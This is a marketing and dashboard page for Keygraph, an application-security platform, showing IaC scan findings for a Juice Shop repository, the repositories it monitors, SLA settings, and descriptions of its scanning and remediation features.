routes/web3Wallet.ts:9CWE-798HIGH
Rows per page 15
1-4 of 4

IAC Scan

local-dev-kg/juice-shop
Completed
master 05e0be7b 11m 1 day ago Manual Fast
Commit message: Update .gitlab-ci.yml file
Total
8
Critical
0
High
7
Medium
1
Low
0
Info
0
Search...
Filter
View
FindingData FlowBoundariesTeamsSeverity
CWE-250: root-container in test/smoke/Dockerfile:1
Dockerfile:1:0juice-shopengineeringHIGH
CWE-829: unpinned-image in docker-compose.test.yml:7
docker-compose.test.yml:7:0juice-shopengineeringHIGH
CWE-829: unpinned-image in Dockerfile:22
Dockerfile:22:0juice-shopengineeringHIGH
CWE-829: unpinned-image in test/smoke/Dockerfile:1
Dockerfile:1:0juice-shopengineeringHIGH
CWE-494: pipe-to-shell in .github/workflows/ci.yml:326
ci.yml:326:0juice-shopengineeringHIGH
CWE-829: untrusted-source in .github/workflows/ci.yml:161
ci.yml:161:0juice-shopengineeringHIGH
CWE-494: unverified-image in docker-compose.test.yml:7
docker-compose.test.yml:7:0juice-shopengineeringHIGH
CWE-494: unverified-image in test/smoke/Dockerfile:1
Dockerfile:1:0juice-shopengineeringHIGH
CWE-494: unverified-image in Dockerfile:22
Dockerfile:22:0juice-shopengineeringHIGH
CWE-494: unverified-image in Dockerfile:1
Dockerfile:1:0juice-shopengineeringHIGH
CWE-829: unpinned-image in Dockerfile:1
Dockerfile:1:0juice-shopengineeringMEDIUM
CWE-829: unpinned-module in .github/workflows/codeql-analysis.yml:33
codeql-analysis.yml:33:0juice-shopengineeringMEDIUM
Rows per page 15
1-12 of 24

SLA Policies

Define how many days your team has to remediate vulnerabilities after detection. SLA deadlines appear on each finding and drive the compliance chart on your dashboard.

Deadlines are calculated from when a vulnerability is first detected. Saving a policy immediately recomputes due dates on all open findings for that severity. Clearing a value removes the deadline for that severity.
Critical
RCE, auth bypass, active exploitation
days
Industry benchmark: 15 days
High
Injection, privilege escalation, data exposure
days
Industry benchmark: 30 days
Medium
XSS, CSRF, misconfigurations
days
Industry benchmark: 90 days
Low
Info disclosure, best-practice gaps
days
Industry benchmark: 180 days
Save Changes

Surface Area

Repositories, container images, and pentest profiles your org is monitoring

New Profile
Repositories 48 Images 2 Profiles 4
Search...
Filter
View
ProfileEnvTarget URLReposScansLast Scanned
tmp 2 juice shop Staging https://keygraph-mdm-test.tunn.dev 1 6 1 day ago Scan
tmp juice shop Staging https://338c-2601-645-8100-7600-5... 1 4 6 days ago Scan
Juice Shop Staging https://qf1esqaymz62oydu1k2vxtyat... 1 8 6 days ago Scan
Test Staging https://qf1esqaymz62oydu1k2vxtyat... 1 3 11 days ago Scan

Surface Area

Repositories, container images, and pentest profiles your org is monitoring

Repositories 48 Images 2 Profiles 4
Search...
Filter
View
RepositoryDefault BranchGroupBoundariesLast Scanned
local-dev-kg/AWSGoatmasterUnassignedNone12 days ago Scan
local-dev-kg/bc-csharpmasterUnassignedNone12 days ago Scan
local-dev-kg/bc-javamainUnassignedNoneabout 2 months ago Scan
local-dev-kg/bc-kotlinmainUnassignedNone12 days ago Scan
local-dev-kg/boundaries-exmainUnassigned7 boundariesabout 1 month ago Scan
local-dev-kg/cxfmainUnassignedNone12 days ago Scan
test/documensomainUnassignedNoneNever scanned Scan
local-dev-kg/driftmainUnassignedNone18 days ago Scan
local-dev-kg/dvws-nodemasterUnassignedNoneNever scanned Scan
test/elasticsearchmainUnassignedNoneNever scanned Scan
local-dev-kg/elasticsearch-testmainUnassignedNoneNever scanned Scan

Surface Area

Repositories, container images, and pentest profiles your org is monitoring

Repositories 48 Images 2 Profiles 4
Search...
Filter
View
Image RepositoryRegistryAuto-ScanLast Scanned
local-dev-kg/dvwa local-dev-kg’s Docker Hub Docker Hub Disabled Never scanned Scan
local-dev-kg/vuln-bank local-dev-kg’s Docker Hub Docker Hub Disabled Never scanned Scan

local-dev-kg/AWSGoat

public · PHP · master

Scan
Public master View on SCM
Target Branch
master (default)
Change Branch
CI Policy
Not configured
Configure
Boundary Analysis
No boundaries analyzed yet. AI can analyze your repo structure and identify scannable boundaries.
Analyze Boundaries
Scan Health
SASTCompleted
969m · about 2 months ago
View scans →
SCA
No scans yet
IaCCompleted
26111m · 12 days ago
View scans →
Auto
Run Security Scan
Select a repository and branch to run SAST, secrets detection, and SCA analysis.
Repository
Select a repository
Branch
Select a branch
Scan Scope
Scan Mode
Scan Types
Language
Select language
AI Provider
Anthropic · Connected and ready for AI-powered scans
Advanced Options
Start Scan
Scan Container Image
Select a repository and tag to scan for vulnerabilities, secrets, and misconfigurations.
Repository
Select a repository...
Tag
Select a repository first...
Scan Image

Your team ships code daily but your pentest only happens once a year. Keygraph closes the 364-day gap with on-demand, automated penetration testing on every build.

A full AppSec platform. Not just pentesting.

Continuous application security across every layer of your stack, from static analysis of your code to runtime pentesting of your apps.

Whitebox Pentester

Full code-aware pentesting. Agents read your source, understand architecture, and generate precise exploits validated against the live app.

Learn about Whitebox Pentester →
Agentic SAST

Code Property Graph plus LLM reasoning. Flags real vulnerabilities with full data-flow context, not regex matches.

Learn about Agentic SAST →
Blackbox Pentester

Autonomous pentesting against the running app with zero code access. On-demand, per repository, no subscription required.

Learn about Blackbox Pentester →
Business Logic Testing

Authorization bypass, IDOR, state-machine flaws, race conditions, and workflow abuse. The vulnerabilities pattern-matchers miss.

Learn about Business Logic →
IaC Scanning

Terraform, CloudFormation, Kubernetes manifests, and Helm charts, scanned for misconfigurations, insecure defaults, and policy violations.

Learn about IaC Scanning →
SCA

Software composition analysis with reachability. Know which CVEs in your dependencies actually matter, reachable from attacker-controlled input.

Learn about SCA →
Secrets Scanning

Find leaked credentials, tokens, and API keys across code and commit history. Validated, deduplicated, and prioritized by blast radius.

Learn about Secrets Scanning →
Container Scanning

Scan container images for vulnerable packages, exposed secrets, and misconfigurations across every layer. Catch issues before they ship to your registry.

Learn about Container Scanning →
Keygraph Enterprise

Operated where
your data lives.

Deploys entirely inside your AWS, GCP, or Azure account. Source, scan results, and AI inference stay inside your security perimeter. No managed control plane. No externally operated data plane.

Self-hosted Run the entire platform inside your VPC. Fully air-gapped, no outbound calls required.
SSO & SCIM SAML 2.0 or OIDC for sign-in. SCIM for automated user provisioning and deprovisioning.
Deep integrations GitHub, GitLab, Azure DevOps, Jira, Slack, plus Docker Hub, GHCR, Amazon ECR, and Google Artifact Registry.
See the Enterprise platform →
Reporting & Analytics

One source of truth
for every finding.

Keygraph deduplicates SAST, SCA, Secrets, IaC, Container, and Whitebox results into a single canonical entry per vulnerability per repository, surfaced on a live security dashboard and synced bidirectionally with Jira.

Canonical findings Content-hash plus LLM semantic matching. One entry per vulnerability per repo, persistent across refactors.
Security dashboard Live KPIs alongside risk, velocity, SLA, and MTTR trend charts. Drill down by repo, team, or severity.
Jira sync One-click ticket creation, 15-minute status refresh, hourly drift sweep on linked pairs.
Explore Reporting & Analytics →
Code Remediation

From finding
to verified patch.

Click a confirmed finding in Keygraph. An agent reads the evidence, writes the fix, and re-runs the original scanner to prove the vulnerability is gone. The verified patch is yours to review and apply through your normal workflow.

Verified before delivery Same scanner re-runs against the patched code. No patch is delivered unless the original vulnerability is gone.
Review gate stays yours Patches attributed to a clearly labeled Keygraph bot, landing in your existing GitHub or GitLab workflow. Never auto-applied.
User-initiated only Patching is triggered when someone clicks a finding — never spawns on its own, never reverts itself.
Explore Code Remediation →
Trust & Security

Your code stays your code.

Stateless processing

Source loads into ephemeral worker memory and is discarded when the scan completes. Nothing written to disk.

Never used for training

Zero-retention enforced upstream with every model vendor. No prompts, completions, or embeddings feed training pipelines.

Bring your own API keys

Route inference through your own Anthropic, OpenAI, Bedrock, or self-hosted endpoint. Tokens never traverse Keygraph.

Read-only by default

Every scan runs on read-only scopes. The only feature that ever requests write access is code remediation — opt-in per finding, delivered as a verified patch your developers review and apply, never pushed straight to your branches.

Self-hosted available

Deploy the entire platform inside your VPC. Air-gapped, isolated, and audited end-to-end on your infrastructure.

Only findings retained

After a scan, source is gone. Only the canonical finding record persists: rule, path, line, severity, status, and a redacted snippet.

Supports pentest evidence for compliance regimes including:

GLBASafeguards Rule NYDFSPart 500 DORATLPT CMMCLevel 3

We don't report what might be vulnerable.
We prove what is.

Schedule a Technical Demo →